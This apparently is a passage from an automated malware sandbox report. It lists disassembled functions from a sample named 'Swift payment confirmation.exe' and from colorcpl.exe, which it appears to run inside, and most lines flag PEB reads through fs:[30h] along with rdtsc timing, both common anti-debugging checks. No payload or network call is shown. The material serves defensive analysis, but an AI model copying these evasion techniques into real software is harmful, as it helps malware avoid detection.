            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D096E rdtsc 2_2_267D096E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_267D2C70
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_032C894C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2674 mov eax, dword ptr fs:[00000030h]2_2_267C2674
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA660 mov eax, dword ptr fs:[00000030h]2_2_267CA660
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AC640 mov eax, dword ptr fs:[00000030h]2_2_267AC640
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679262C mov eax, dword ptr fs:[00000030h]2_2_2679262C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C6620 mov eax, dword ptr fs:[00000030h]2_2_267C6620
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8620 mov eax, dword ptr fs:[00000030h]2_2_267C8620
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE627 mov eax, dword ptr fs:[00000030h]2_2_267AE627
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2619 mov eax, dword ptr fs:[00000030h]2_2_267D2619
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268106F1 mov eax, dword ptr fs:[00000030h]2_2_268106F1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E6F2 mov eax, dword ptr fs:[00000030h]2_2_2680E6F2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E609 mov eax, dword ptr fs:[00000030h]2_2_2680E609
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA6C7 mov ebx, dword ptr fs:[00000030h]2_2_267CA6C7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA6C7 mov eax, dword ptr fs:[00000030h]2_2_267CA6C7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C66B0 mov eax, dword ptr fs:[00000030h]2_2_267C66B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC6A6 mov eax, dword ptr fs:[00000030h]2_2_267CC6A6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794690 mov eax, dword ptr fs:[00000030h]2_2_26794690
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685866E mov eax, dword ptr fs:[00000030h]2_2_2685866E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798770 mov eax, dword ptr fs:[00000030h]2_2_26798770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0770 mov eax, dword ptr fs:[00000030h]2_2_267A0770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683678E mov eax, dword ptr fs:[00000030h]2_2_2683678E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268447A0 mov eax, dword ptr fs:[00000030h]2_2_268447A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790750 mov eax, dword ptr fs:[00000030h]2_2_26790750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2750 mov eax, dword ptr fs:[00000030h]2_2_267D2750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C674D mov esi, dword ptr fs:[00000030h]2_2_267C674D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C674D mov eax, dword ptr fs:[00000030h]2_2_267C674D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov eax, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov ecx, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C273C mov eax, dword ptr fs:[00000030h]2_2_267C273C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268107C3 mov eax, dword ptr fs:[00000030h]2_2_268107C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC720 mov eax, dword ptr fs:[00000030h]2_2_267CC720
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681E7E1 mov eax, dword ptr fs:[00000030h]2_2_2681E7E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26790710 mov eax, dword ptr fs:[00000030h]2_2_26790710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C0710 mov eax, dword ptr fs:[00000030h]2_2_267C0710
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC700 mov eax, dword ptr fs:[00000030h]2_2_267CC700
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267947FB mov eax, dword ptr fs:[00000030h]2_2_267947FB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267947FB mov eax, dword ptr fs:[00000030h]2_2_267947FB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B27ED mov eax, dword ptr fs:[00000030h]2_2_267B27ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680C730 mov eax, dword ptr fs:[00000030h]2_2_2680C730
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679C7C0 mov eax, dword ptr fs:[00000030h]2_2_2679C7C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814755 mov eax, dword ptr fs:[00000030h]2_2_26814755
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267907AF mov eax, dword ptr fs:[00000030h]2_2_267907AF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681E75D mov eax, dword ptr fs:[00000030h]2_2_2681E75D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BA470 mov eax, dword ptr fs:[00000030h]2_2_267BA470
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A49A mov eax, dword ptr fs:[00000030h]2_2_2684A49A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B245A mov eax, dword ptr fs:[00000030h]2_2_267B245A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681A4B0 mov eax, dword ptr fs:[00000030h]2_2_2681A4B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE443 mov eax, dword ptr fs:[00000030h]2_2_267CE443
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA430 mov eax, dword ptr fs:[00000030h]2_2_267CA430
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E420 mov eax, dword ptr fs:[00000030h]2_2_2678E420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C427 mov eax, dword ptr fs:[00000030h]2_2_2678C427
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8402 mov eax, dword ptr fs:[00000030h]2_2_267C8402
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267904E5 mov ecx, dword ptr fs:[00000030h]2_2_267904E5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816420 mov eax, dword ptr fs:[00000030h]2_2_26816420
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C44B0 mov ecx, dword ptr fs:[00000030h]2_2_267C44B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267964AB mov eax, dword ptr fs:[00000030h]2_2_267964AB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A456 mov eax, dword ptr fs:[00000030h]2_2_2684A456
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681C460 mov ecx, dword ptr fs:[00000030h]2_2_2681C460
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C656A mov eax, dword ptr fs:[00000030h]2_2_267C656A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268105A7 mov eax, dword ptr fs:[00000030h]2_2_268105A7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798550 mov eax, dword ptr fs:[00000030h]2_2_26798550
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26798550 mov eax, dword ptr fs:[00000030h]2_2_26798550
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE53E mov eax, dword ptr fs:[00000030h]2_2_267BE53E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0535 mov eax, dword ptr fs:[00000030h]2_2_267A0535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826500 mov eax, dword ptr fs:[00000030h]2_2_26826500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864500 mov eax, dword ptr fs:[00000030h]2_2_26864500
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC5ED mov eax, dword ptr fs:[00000030h]2_2_267CC5ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CC5ED mov eax, dword ptr fs:[00000030h]2_2_267CC5ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267925E0 mov eax, dword ptr fs:[00000030h]2_2_267925E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BE5E7 mov eax, dword ptr fs:[00000030h]2_2_267BE5E7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267965D0 mov eax, dword ptr fs:[00000030h]2_2_267965D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA5D0 mov eax, dword ptr fs:[00000030h]2_2_267CA5D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA5D0 mov eax, dword ptr fs:[00000030h]2_2_267CA5D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE5CF mov eax, dword ptr fs:[00000030h]2_2_267CE5CF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE5CF mov eax, dword ptr fs:[00000030h]2_2_267CE5CF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B45B1 mov eax, dword ptr fs:[00000030h]2_2_267B45B1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B45B1 mov eax, dword ptr fs:[00000030h]2_2_267B45B1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE59C mov eax, dword ptr fs:[00000030h]2_2_267CE59C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C4588 mov eax, dword ptr fs:[00000030h]2_2_267C4588
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792582 mov eax, dword ptr fs:[00000030h]2_2_26792582
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792582 mov ecx, dword ptr fs:[00000030h]2_2_26792582
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810283 mov eax, dword ptr fs:[00000030h]2_2_26810283
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678826B mov eax, dword ptr fs:[00000030h]2_2_2678826B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26794260 mov eax, dword ptr fs:[00000030h]2_2_26794260
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796259 mov eax, dword ptr fs:[00000030h]2_2_26796259
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov ecx, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268262A0 mov eax, dword ptr fs:[00000030h]2_2_268262A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A250 mov eax, dword ptr fs:[00000030h]2_2_2678A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678823B mov eax, dword ptr fs:[00000030h]2_2_2678823B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268662D6 mov eax, dword ptr fs:[00000030h]2_2_268662D6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02E1 mov eax, dword ptr fs:[00000030h]2_2_267A02E1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A2C3 mov eax, dword ptr fs:[00000030h]2_2_2679A2C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26818243 mov eax, dword ptr fs:[00000030h]2_2_26818243
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26818243 mov ecx, dword ptr fs:[00000030h]2_2_26818243
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A250 mov eax, dword ptr fs:[00000030h]2_2_2684A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684A250 mov eax, dword ptr fs:[00000030h]2_2_2684A250
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02A0 mov eax, dword ptr fs:[00000030h]2_2_267A02A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A02A0 mov eax, dword ptr fs:[00000030h]2_2_267A02A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686625D mov eax, dword ptr fs:[00000030h]2_2_2686625D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840274 mov eax, dword ptr fs:[00000030h]2_2_26840274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE284 mov eax, dword ptr fs:[00000030h]2_2_267CE284
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CE284 mov eax, dword ptr fs:[00000030h]2_2_267CE284
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268163C0 mov eax, dword ptr fs:[00000030h]2_2_268163C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684C3CD mov eax, dword ptr fs:[00000030h]2_2_2684C3CD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268343D4 mov eax, dword ptr fs:[00000030h]2_2_268343D4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268343D4 mov eax, dword ptr fs:[00000030h]2_2_268343D4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov ecx, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E3DB mov eax, dword ptr fs:[00000030h]2_2_2683E3DB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C310 mov ecx, dword ptr fs:[00000030h]2_2_2678C310
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B0310 mov ecx, dword ptr fs:[00000030h]2_2_267B0310
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA30B mov eax, dword ptr fs:[00000030h]2_2_267CA30B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C63FF mov eax, dword ptr fs:[00000030h]2_2_267C63FF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE3F0 mov eax, dword ptr fs:[00000030h]2_2_267AE3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A03E9 mov eax, dword ptr fs:[00000030h]2_2_267A03E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov ecx, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26868324 mov eax, dword ptr fs:[00000030h]2_2_26868324
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679A3C0 mov eax, dword ptr fs:[00000030h]2_2_2679A3C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267983C0 mov eax, dword ptr fs:[00000030h]2_2_267983C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
